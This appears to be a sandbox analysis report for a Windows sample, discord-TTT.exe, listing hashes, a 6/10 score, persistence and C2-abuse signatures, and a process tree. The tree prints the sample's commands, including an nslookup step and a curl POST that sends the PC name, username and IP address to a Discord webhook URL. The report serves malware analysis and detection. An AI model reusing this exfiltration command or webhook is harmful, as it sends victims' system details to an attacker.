Overview

overview

6

Static

static

3

discord-TTT.exe

windows10-2004-x64

6

Analysis

  • max time kernel
    6s
  • max time network
    5s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/08/2024, 22:08

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    discord-TTT.exe

  • Size

    154KB

  • MD5

    0e67157d1b3263729784e62105b4756f

  • SHA1

    a7f1ddf004d293dd8d6fd880ae5583a52bac0635

  • SHA256

    a84e2b1012bbfdbcc247a580e858cb7f04bfe86f9e727a84ccfee64e45f3c109

  • SHA512

    b21c32e6a5639efb1d49cb4f76dba8d4b1444666ef93c41a170cfde90d3ff90b9c0a1dd7b19a3e411f6a19ee1ce7fee44bef2e07f621eb622776a01942913964

  • SSDEEP

    3072:gahKyd2n31h5GWp1icKAArDZz4N9GhbkrNEk1CT:gahOdp0yN90QEd

Score
6/10
persistence

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\discord-TTT.exe
    "C:\Users\Admin\AppData\Local\Temp\discord-TTT.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "discord.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c nslookup SYMRKCCU | findstr /c:"Address:"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1396
        • C:\Windows\system32\nslookup.exe
          nslookup SYMRKCCU
          4⤵
            PID:3056
          • C:\Windows\system32\findstr.exe
            findstr /c:"Address:"
            4⤵
              PID:4468
          • C:\Windows\system32\curl.exe
            curl -H "Content-Type: application/json" -X POST -d "{\"content\":\"PC Name: SYMRKCCU\nUsername: Admin\nIP Address: 8.8.8.8\"}" https://discord.com/api/webhooks/1236334882985218179/S7WSzhe6PWIirNmvsPHgCd_PKDE3dcN4l17JQO6rEcKTlbbAPa8ThVvv4M-7SGstvOL5
            3⤵
              PID:1288
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4072,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:8
          1⤵
            PID:760

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\discord.bat
                  Filesize

                  464B

                  MD5

                  7858122dd3a683d64029080d6c01f485

                  SHA1

                  a97547489baa110fd7e28884658a1e00bab845b3

                  SHA256

                  12f9a3a0baffd7aefd7e8943f3b08744bbe60e63806569da5772d2613605aa50

                  SHA512

                  a93a74ac945e1d8de6f6c3c09c8dee2236af1d36b132153a4c4492f98f38421cca18263c6f03f92c952b437589a770705f63c92dcce6c6636f5a6f876e3d6b84

                  Download Submit